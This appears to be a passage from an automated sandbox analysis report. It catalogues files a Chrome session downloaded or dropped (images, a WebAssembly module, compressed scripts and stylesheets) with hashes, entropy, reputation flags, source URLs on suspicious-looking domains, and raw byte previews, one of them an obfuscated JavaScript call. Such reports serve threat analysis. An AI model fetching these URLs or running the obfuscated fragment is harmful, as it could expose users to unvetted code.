                                                                                                                                                          Preview:.asm........`.......`....`..`...`.....`....`.....`..~......`.......`......`......`..........`........`..~..`..~.`...`.....~`.~..`..|`.....|`..~....`.~......`..~.....`.........`..|.`.........`.............env.runtime.ticks...wasi_snapshot_preview1.fd_write...env.syscall/js.valueGet...env.syscall/js.valuePrepareString...env.syscall/js.valueLoadString...env.syscall/js.finalizeRef...env.syscall/js.stringVal...env.syscall/js.valueSet...env.syscall/js.valueLength...env.syscall/js.valueIndex...env.syscall/js.valueCall..........................................................................................................................................p.............A......A....A.......memory...malloc.~.free...calloc....realloc...._start....resume....go_scheduler....asyncify_start_unwind....asyncify_stop_unwind....asyncify_start_rewind....asyncify_stop_rewind....asyncify_get_state.......A...BDVXYZ[\;:..............#.A.F.@#.#.(..A.k6..#.(..".(..!. .(..!. .(..!. .(..!. .(..!. .(..!....#.A.F.@#.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1x1, components 1
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):332
                                                                                                                                                          Entropy (8bit):6.8679847753890115
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:6:dfNIOW/mfM8plt//kC7kmdViN0XxgRPWTTbOsvWGKkCHdcfmcGn1NMf/qLnDzofo:FC9YM8p//slJ0Xx0WzOsvWGKkCHdcfmx
                                                                                                                                                          MD5:BD9D76386CEE85AC4BE2F43FB3156A02
                                                                                                                                                          SHA1:D1BFC8928661CA2B2F71562EDC745419C582A88E
                                                                                                                                                          SHA-256:A26A53CFBFBF7CAE14898AC89EE39558CD9ED81D4E1D86FF2E5D17B6C185DC1F
                                                                                                                                                          SHA-512:7CDBE4BDD27C94FB93BE7DFFD3AB47BFA785FF578FB6EBFB5DEDA7527CA1122A76AAB1BBC900C02AA2E95686DC0B52CE95C9589721E89B771FBC7079C5057AD8
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://ocsapi-aka.blackkhaki918.com/ocs/cc.png?1717972843131
                                                                                                                                                          Preview:......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342..................................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz.................................................................................?.....
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 231x135, components 3
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):15093
                                                                                                                                                          Entropy (8bit):7.9524351565226485
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:TpDmpvlG/p2S5debP9KQ3nlAd8LLf2aM77qh1HAdysV:TFA0p2i8A8aaM7eh6dyS
                                                                                                                                                          MD5:46C57C51B8DF1740D25BBABBAADA22A5
                                                                                                                                                          SHA1:AFC3B7126B10FF529F254D0445532E57DF189479
                                                                                                                                                          SHA-256:ABB838D5A5AF338C8A792C810C027E8723AC2499A2D5FD3A69E8FEA5AF5A7101
                                                                                                                                                          SHA-512:F5FD8851D65813989D798F464F50FDBC20B76470189CF7DF26CC3B1B983EC0486CE39C4BD108D315EA02ADE80E307B4133B20BA3E9D211F04C6BCBFF7EC657A2
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:......Exif..II*.................Ducky.......P......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:29498082-5ddd-3c4d-86ad-a7cbd10a716b" xmpMM:DocumentID="xmp.did:6D4B3F328D5911E7A155C2C7373E56B1" xmpMM:InstanceID="xmp.iid:6D4B3F318D5911E7A155C2C7373E56B1" xmp:CreatorTool="Adobe Photoshop CC 2017 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:82b9be3e-f922-d048-8196-e2c819558962" stRef:documentID="adobe:docid:photoshop:eddc2de5-6163-11e7-92d7-efec1b3bcc87"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d...............................
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 21 x 21, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):3209
                                                                                                                                                          Entropy (8bit):7.880935308883866
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:96:JllcHitlIxv9vk7C1+I4wWHLihk/xZSyzUIE:KIIHUCD4wa3SyAb
                                                                                                                                                          MD5:5DD86F019FE3F739EECE950ACA134B69
                                                                                                                                                          SHA1:D6CC0D28F8DD994AA9D9F9D37DE41911D71C4E5B
                                                                                                                                                          SHA-256:D9D73CD1D77CC9EE6ED8CC22468B0930FCDF05C60118B16578536660F50C4E13
                                                                                                                                                          SHA-512:4AB75ADF4F2317E608A473D10FF56B8D4541A7590D922002639A21F31311D1E795E37172B04655808F04052B52FD031992B0B6584CC83ED6DC724257E67CEF4E
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR.....................gAMA......a....IiCCPsRGB IEC61966-2.1..H..SwX...>..e.VB..l.."#....Y....a...@...V....HU...H...(.gA..Z.U\8....}z...........y.....&..j.9R.<:...OH.....H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly|B"......I>................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0.._p..H.....K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0.>.3.o..~..@...z..q.@......qanv.R....B1n..#.....)..4.\,...X..P"M.y.R.D!.....2......w....O.N....l.~.....X.v.@~.-......g42y.......@+..........\...L....D..*.A..............a.D@.$.<.B.......A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ..Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$...N.!%.2I.IkH.H-.S.>..i.L&.m....... ......O.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 155 x 155, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):47037
                                                                                                                                                          Entropy (8bit):7.99157199179088
                                                                                                                                                          Encrypted:true
                                                                                                                                                          SSDEEP:768:kFQH/rqRUJ8FxcRtKkW0eDF+9LgrSQI7rqzCEq2KdCBy2G+uAmR9RS2ISyjd3zB+:kFQHuRUKFyRtKk9S+YSKWEKIBNbk0jtQ
                                                                                                                                                          MD5:24310561B355C9CD5DF37EA16D6DFD48
                                                                                                                                                          SHA1:23DA99C2E6C9CE818B229F370463DD1F83259D35
                                                                                                                                                          SHA-256:9E88CC67EA4F1EAC829922B9FBDE3239EEFB7242581FA0DB69589F0ED403EFB0
                                                                                                                                                          SHA-512:2989186D05D4B700FA4ACE4FB4CF7CBAEAF4551044A8B2A13FD54C41E8EC46534F6A7208691AC5CF12D0FC0A5EA452A3D338EE2F63E887AAE77AF37F689B1CA8
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/index/312/nav/sports/sb.png
                                                                                                                                                          Preview:.PNG........IHDR.............ua.....tEXtSoftware.Adobe ImageReadyq.e<...&iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC 2017 (Windows)" xmpMM:InstanceID="xmp.iid:4B70E39BCDEB11E9AE98C341B6C88BB3" xmpMM:DocumentID="xmp.did:4B70E39CCDEB11E9AE98C341B6C88BB3"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:4B70E399CDEB11E9AE98C341B6C88BB3" stRef:documentID="xmp.did:4B70E39ACDEB11E9AE98C341B6C88BB3"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.......-IDATx......?^.&...w..Y $D......6`..g.|.....>..|.}g..`l..6.$....HH(gm.qr......E..0..%........t......k.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:WebAssembly (wasm) binary module version 0x1 (MVP)
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):108015
                                                                                                                                                          Entropy (8bit):6.099067518890094
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:1536:uaglDavyQEyIWLcb/+W+2CJr71V+F3pdMBFf/kqjYf2FvZ/DKj8m9S4Aww0EEY:XlJM+W+2CJrs3pdOrkfkv0j8N2wEY
                                                                                                                                                          MD5:3875C16DCC2FC3155E37F22AA92632D0
                                                                                                                                                          SHA1:25D140EF2CF2AB3C6C9F656D2BE3C756068D5E0E
                                                                                                                                                          SHA-256:F682A144DBA0F29228190EEAAC8014C502C7539949128E9A5C8986BBEBAD8EE6
                                                                                                                                                          SHA-512:B946D8F48D3789B07E21E0EF5A761615E78F134277387E454160FA4C74EC04378DE5A5C44C459EF05C9FEFE4DF272AAB22ED3FAD259EA2D962F2E19AE77C1A19
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://stt-wasm.ai4funs.com/mimlib.wasm
                                                                                                                                                          Preview:.asm........`.......`....`..`...`.....`....`.....`..~......`.......`......`......`..........`........`..~..`..~.`...`.....~`.~..`..|`.....|`..~....`.~......`..~.....`.........`..|.`.........`.............env.runtime.ticks...wasi_snapshot_preview1.fd_write...env.syscall/js.valueGet...env.syscall/js.valuePrepareString...env.syscall/js.valueLoadString...env.syscall/js.finalizeRef...env.syscall/js.stringVal...env.syscall/js.valueSet...env.syscall/js.valueLength...env.syscall/js.valueIndex...env.syscall/js.valueCall..........................................................................................................................................p.............A......A....A.......memory...malloc.~.free...calloc....realloc...._start....resume....go_scheduler....asyncify_start_unwind....asyncify_stop_unwind....asyncify_start_rewind....asyncify_stop_rewind....asyncify_get_state.......A...BDVXYZ[\;:..............#.A.F.@#.#.(..A.k6..#.(..".(..!. .(..!. .(..!. .(..!. .(..!. .(..!....#.A.F.@#.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (1108), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):1108
                                                                                                                                                          Entropy (8bit):5.729471141044463
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24:VTJy8C6pikIzUR3lgWdXa4fsWkIE1534Mn:V1y8CfkIIsfp805x
                                                                                                                                                          MD5:289AB89918C9218F3ACFA537C89D5FC4
                                                                                                                                                          SHA1:1741F5D0F72485C8FFDDA210B1D2F455C0B7E88C
                                                                                                                                                          SHA-256:273768BE62F22F138242F6C2680325874BE0D2AD875B968CA411005438D8635A
                                                                                                                                                          SHA-512:EAC176D5F269DB93687927FAC7D8302D14AA9CF1627993F67E6CE0F0BE0002D43694B6D1D638FF72ED8B54DB0D934F8AA10CAD1CB9E31EB7C010364AA5C2E139
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/240516-03/static/js/components/125/footerImg.js
                                                                                                                                                          Preview:a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtAnABgEYBdAGgG8AlABQFZ8AuAMwFc0YAXAS3Uw9JABKcgF9SAFQDsAFgBazNpx5o+A0mmEAiFkhAACJBwBOXTpoDcAeTAArEJwB0AExBMuaENSMoIIIxwBPTBBSTQB9MJAkAFkUJxYAGxBNCgA3KASWEAYAQnwRQXN0oz0uAF4VTXwYCCZNQVIjMvIYFABbCHQQNA4kBhb2iGoofw8jABkuQwV2bl5hIxAOFiM0PTQHEEwAJlxpQQcOAAtuzA2wdyczxITQgCE4AGoOesERMScoDigZpXnyRbLVbkJBGGAMTQpGAxKBcBIQlLQUZ+ADKRxQwFyhFIMCcaGGxwYXGcrigiQ4DgAwuhDFAeg5cWgABIoQykLhtKAAcxAAFVKOMIQB6DnckAAWggMBFaBcAA8hYRtrQhZp3jjBiwOCAnP0xG0luinH1RDjFl8db85iphMU9BwyscpgIysBLhiHCiANIASQAcuZKoQAII2Ln1TCaByqx4gR6aGXyhw2JD1Q4nFSsWbKYK2kbrMogBxMFAobVGcwUgAkHjlHHEpjgmCzfxt5ApoJgFQcHK5pAp0OisIS3cHw/7DiRHDGaIx3anM/RwAKK9IbRQbG1upb1swwnVUGai1lfitObzJQdTqQLurMHN2oAokkDT11I6HGFdAkmJ+YAAff8QHMQEVjWSonC4VIUhBb5uBgSkEigJA+k0Esyz8cVezVUhsApBdUSXAB+SpWg6SURmnPxJkMeoGApSI9wnMJUkjPR6nUSNIOgihaXgxDkNQ9DyywtouXFBJ3GSApmNYzR2IaCCoJgvjTAElCIWEzDe3FTl3BwvCHE7EiuOU3DKmwigvmME1O3ohk8QJI5nh7TkeX5cZ4y0owYw7MF3kEYhBHsxiGgYuSFInMc4RMzRuJSbBKiQaA0AS8K+E/JAMuihJBEC/KQq2fKyEIN5SFUmBKG6FwjAAMTQPp
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:GIF image data, version 89a, 1000 x 100
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):92340
                                                                                                                                                          Entropy (8bit):7.820773065912663
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:1536:qq74uBvQx0585mbl7JI15zw6uVjHN6dHazDVunG71Z0Pbth1pNt+ZiU8v6Ok43cX:R9gmx7JI1506awd6fY61MpT+ZiH3cX
                                                                                                                                                          MD5:AFCF89D7A02EAD991EA300184D892B52
                                                                                                                                                          SHA1:D2766D9B06DA3CB6289D0B30D2155B173CEC67A2
                                                                                                                                                          SHA-256:FB01E00D2A27089373FDDEF49FE6B8F0D607075CAB77B77FE3E77FE436435AE4
                                                                                                                                                          SHA-512:79104737C29D6872EF3EA3257D7C5CE60CAD9AD512ACD51275F1EE821969FF4D386A8D474C92D24A7A42604BD3D53D07F90DC3986A92797F97984DFE7D0765F6
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:GIF89a..d....m...jS..#..U.ycH.q..8....i.P.jS..DS.U..j....{j..p..Hl...uR..V......n.-.......f.....V.[L.E.lb..n..r.(.8.dS..I..2.dSe.g.$W..s.7...uj....{.lb..[..r......cK.....d..[......|r.dZ.y\...-zg.bL..\..s.....*.eZ..Zy6.......qT.....2j.y..s.uj..2...Y..l..j..D|K....y\.qT..E8.Z..*.....]....u...........l.|r..:..G...{j..Q.zc.....E....X..H.....s[..k..x....sc......lQ......rS.l[..v..F.z]6kA..]}.Y.....r..s..b....pO.$..#..K....ui..r..d.yT...eS....e\..k.k[.....f!zW.zU.q]..v.nM.{i.}e.ud.q].mX.ua.mX.ye.q].m].qa.}i.iY.4.....m].ue.iY.}e.yi.u].ua.qa.qY.ya.}m.qY.u]..i.ue..m.i].qf.i].}i.ye.ym.qf.yi.}`.}e.uX..n.ua.q].uf.}n.uX.qa..i.mX..n.m^.y`.iW..O..h.u].qX.mX....yn.m^.q].iW.}`..o.pf.qa.i^.qY.ua....h.uX.u].uf../.i^.uY..Q....qf........e^..o.^\.yY..m.........!..NETSCAPE2.0.....!.......,......d....._..H......*\....#J.H....3j.... C..I...(S.\.r...6`z.. ....J.(.D...A,.pUB\.L(.R...5S.@.r...5U...u.r.~.*7...,.j...4d.....2..M.En..Q.eZG..5....eZ`_..9&....5....-..b
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (29804), with no line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):29804
                                                                                                                                                          Entropy (8bit):5.998824134543712
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:768:9rOkvGmRxvXACHcXF01/edkhJ4JWX2q2pnuNaJHf:95DRxvfgO/hJ4JWGZpnQaJHf
                                                                                                                                                          MD5:13334ED6E02963EA6A779F38ADB4E8D8
                                                                                                                                                          SHA1:EB899D449F878B56FB85EBE7BE00538463A246DA
                                                                                                                                                          SHA-256:F8A6C9FA622734CBB4531D60BD5B7574A1F48E5C131C797F5626029416A1ECCA
                                                                                                                                                          SHA-512:DB1DBC6E631B6ABE943630DAEA67F4540465AEF9479839A2FDC5F1FF13ED288A3C98F9619253A7B7CCC03B686B23C92BF85C667A7AB3729FD3FAE99CD3E12574
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:u9mEPUGiHlEmTCgtFvEn3vahEriw3ILv8NsvmpzXG3YtZkZYMvLfdvoR+5/mMWPH+eM6syq5k9AO29LQc1S2BLYwGIu5XQ2w440KGJzFJ9C9UTEI58vF5mRTycaJWLkb9dSEODtsyEDONZhztvmlC4GuqazxoGsdgFejm+jKn/tOwjodmm1oP2xl76FYzDrE/3xvsbQ4xEA7slAaNHrgAyC8BJoG4qpRlIKBK4W961AfQgA6uAtPL0Y+O6045KPKur+uOD/6gMaDAzxVzZ6o2pLeZFU1SZ5/KhfAOFea5oNV2XtOYbVE+P57ZZDjxmwk8UQ9nffiOI8VY3sWWFNxUvX2aY+2h4xhGQ8ku2P/o96Y0Im4KTX37ti+8J3H4oj162WB1hMfXJUA8BuABo3lshuOSADgPtD/89s3XCk69+mPhNMUSYtc1e62Wqc/QkKdGw99UneI90erYCyD2Hn/ACISZlTL8BSNTsx7BcFy67KIiK+Iaq5hP195wunWPa/PH1wYUCxvnMolktfDD3oX5R0Lp8cVkQLBQN5g2pMlSYSkMEyiuV2GxkSL769kLT0WtVIrO/PHfsp3LbaDyrEa5S20tHeCP7HoB+7O5HpQkLakb4oT5Cnv8fiaXGjPRxwNunXBUC3skW0M/g1mB0ijVD2O7FqvtgboJkfLJmLi2XrUwkGEVh2mLIIc/cEFD31KQ3L9XwNiNLrFz3z7TD5Ss5PWo8IeuvpSsIyA7tG9Pat1LZkBhT0TvPwMQpHBXk6z+gWACBFQWGBaAow1G1bniWU22rs2mOWOM3L3bDD+L0Tkx1SJuo/+AQ07yN1+7JYcQEyQH3q9zrhh8O20oNxcZpKyU27kcot6mw0vktfYZRaIuq8eoszUTdFarDB6S45P7qGcd5A6qZn2isQxOVUEaaLNYUX3RdouXHp0KC+ZnZtkvMmmk5owq3aXEFnYI8I/QUzXBaLIST/QyLF3OZ1+9IpQ431GTe/doH9HnEc3
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 231x135, components 3
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):15093
                                                                                                                                                          Entropy (8bit):7.9524351565226485
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:TpDmpvlG/p2S5debP9KQ3nlAd8LLf2aM77qh1HAdysV:TFA0p2i8A8aaM7eh6dyS
                                                                                                                                                          MD5:46C57C51B8DF1740D25BBABBAADA22A5
                                                                                                                                                          SHA1:AFC3B7126B10FF529F254D0445532E57DF189479
                                                                                                                                                          SHA-256:ABB838D5A5AF338C8A792C810C027E8723AC2499A2D5FD3A69E8FEA5AF5A7101
                                                                                                                                                          SHA-512:F5FD8851D65813989D798F464F50FDBC20B76470189CF7DF26CC3B1B983EC0486CE39C4BD108D315EA02ADE80E307B4133B20BA3E9D211F04C6BCBFF7EC657A2
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb1-hw.qectyoua.com/pc/image-pc/video/ag_h.jpg
                                                                                                                                                          Preview:......Exif..II*.................Ducky.......P......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:29498082-5ddd-3c4d-86ad-a7cbd10a716b" xmpMM:DocumentID="xmp.did:6D4B3F328D5911E7A155C2C7373E56B1" xmpMM:InstanceID="xmp.iid:6D4B3F318D5911E7A155C2C7373E56B1" xmp:CreatorTool="Adobe Photoshop CC 2017 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:82b9be3e-f922-d048-8196-e2c819558962" stRef:documentID="adobe:docid:photoshop:eddc2de5-6163-11e7-92d7-efec1b3bcc87"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d...............................
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:gzip compressed data, from Unix, original size modulo 2^32 14857
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):4126
                                                                                                                                                          Entropy (8bit):7.9584178336988485
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:96:YK+LFVnC8QaQV08CIFufD2xOx/mpTWTjvwCnxdBOTi:l+LFzh5r2xymVW/wmr
                                                                                                                                                          MD5:E760677F4C48D9F9E8B95EF4B6F87FA8
                                                                                                                                                          SHA1:1E8731B8C43003B65A5E7132D6E51D1E991EB125
                                                                                                                                                          SHA-256:3E6115C7F94633F37AA0482064FF05299010E6B7D36B3EE8698389F83F5536C9
                                                                                                                                                          SHA-512:1EBB5B6C821891EB74621CB973705D6B61CC3792823080FE7BA869BB1C0DC18818E6CA84F38F7C1D601A047B11D34E64AA554093430904DD9789A600AC1D0487
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://brhrjf.yuhu06.xyz/061410/rcenter/common/js/gamebox/common/jquery.validate.extend.msites.js
                                                                                                                                                          Preview:.............r.6.Ul.+..EKv.&.iO.8Mf...z?$.CI.."..r..".,.N......R.]....8O.....b....d...0..I0...Y..;.].d.7..0...[..j4.....g.g..a).[.._.(......bY.(.+.f..#.:Ea....z.I..Q.:..O"..`..U*.e....E...}.......h.Z.......O..^&..b.,.<.W"M..2.....Y..;..^..R.e/D..v...d..e~......8'.s..8I.......'.a..bl.0s....8.\....0...\lL..5.=y.g.h.Vx.h wO..B.E+Yz>.U#.jm/...6[..a...z-..F@?..d.h..V*....I...e.fq.?..s..uQ..r4...*ASiz...%.l.t..."...M...,...p.>c:....$.5M...r.....v.g;.M...b.+Z/..rpR...A.y3.-Z.(...1T...y.~)..!.K...`<6.Ri.$TO...bs.u.H..|.8.M....E(.)...R..,..3 ^gS.........#J+"^.......J3.9 Z...B.c.c...@.e<......9.).q..n......W.J..i.I.A.z...yd...O..P>..|..b!.q..&~.....y..Xd0.......V...m.......d...:.F.C.#.\].O.y..fX.i...^.....#MAXP_..F..ow.3.J.....k....q.>`..p..uA.w*....$....D.......Y$.<]J#..8?d....F....#..V3lZ..r............mg5LE.k5Hq.:P).....-..daP._..W. [x..2&e.:.E%..9.......[9...`.&..3..oo..+]..i8....C..V..hc$.Y...........^.......v....C&2N1..4.NEj..`. w....2....
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:gzip compressed data, from Unix, original size modulo 2^32 11602
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):3788
                                                                                                                                                          Entropy (8bit):7.9461485465006305
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:96:xvLmU+AZJA6gqZH3R7HAOUrBAOS6C1PD8jfAkfsmMv:AZh6/ZHBpKFS6ebe1a
                                                                                                                                                          MD5:D51611D3E17AC5A1DEEC5990BC566D40
                                                                                                                                                          SHA1:A0F11D99C3819D8E564E2E721FC2DFDB697D4E56
                                                                                                                                                          SHA-256:D09021AA2121EA450E9328268D81DBAAC3FC13B510EA6D0272005A4F4C8E2F09
                                                                                                                                                          SHA-512:1064F36ED8D5AC6B06367F9ED0898F498DF489FFBBFAA7EE2C432FC5BDD08A4039FD448573D0BA9F28AC983C2EFDA6F4EC237D937FB9E0A702B0E04BE43D86BC
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://8vpfnx.eveday.me/061410/rcenter/common/static/css/gb.validation.min.css
                                                                                                                                                          Preview:...........Z[..Xv~...L......O..1`.\...H#.m...6....H#E....!R.2o."Ey.)J~Mzf./.m.....d8...........|..w...?...........o...y.y....+.@.s.|...^X..........w.....c..cN.P.!Q]....sK`..W.M.+( .........5....\..[.}.4..._...Y=-\X....[.mZ.#......(....5M...2..d_.... ...n.gclo../.....E..Z.9:Yh)k...?Y=..4?[.=.c{z!.6G....O...)....`..G.Kx(.P._rO..Y....8rS.....A..R.c2s...+..A..-.Y].>X{Z.yB.PM>'.z..O.....p..|........Og..........'..A`.6.!......^$."]Y.!..m....%.b.>..#\....sonGof.x@..5{.<..X....&%.#.d.G.T.o...$.p....;..KY...#va..>.....<...,.k_.x....3..=.z.I.h....Eh.*....y..z......1..5..8E=..74.V.B.=....K.O<..t#L`h%.?s.z........=.......O.N....Z8~f......17F..O.kq/]F.7..%...RU...eX.Z...).^.\uluq^~.\.].x..........~Z.6..._7|=.N;.?..Svw....\..S....9..k..=.....S.Gd..^.$.;.)]/&.+O.|J.Y..7...e>....wLFI].B.,...d8...|F.t.k...D...5.y...._L{..+-..Sm...y..b|s!.......o.ir.........y._.e...p.k.P.....R........Y..].......O.....5.......w1.|c....9......I>...v].^......unCTY9A.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 231x135, components 3
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):17264
                                                                                                                                                          Entropy (8bit):7.957851912730042
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:Bd/F5IhIlqmVUgkOduOyX2sjzELCfBhC6DvFSi9q:B70IImVUvOduOyGsikhC6DvFE
                                                                                                                                                          MD5:CF4793E4F829969195CB58EFFDFFCC3C
                                                                                                                                                          SHA1:73EA126C25F1EC7E02A3216AFBDC68204EDC18BB
                                                                                                                                                          SHA-256:1E91C94ABA2BC799802FCB49FEE566D9095FE76D2C2EEBE7E876E06E50DD6E00
                                                                                                                                                          SHA-512:6C837B9092076E7DA94E8305573C76631CA9402B2E903D6B9EF10EB18585D874B1F29F2D2267D34DCCE18AEAE0172A3E0023354C01EF7A44827EA09A264B8D84
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:......Exif..II*.................Ducky.......P......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:29498082-5ddd-3c4d-86ad-a7cbd10a716b" xmpMM:DocumentID="xmp.did:BF908D248D5811E78563D2E50C3F5203" xmpMM:InstanceID="xmp.iid:BF908D238D5811E78563D2E50C3F5203" xmp:CreatorTool="Adobe Photoshop CC 2017 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:82b9be3e-f922-d048-8196-e2c819558962" stRef:documentID="adobe:docid:photoshop:eddc2de5-6163-11e7-92d7-efec1b3bcc87"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d...............................
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JSON data
                                                                                                                                                          Category:downloaded
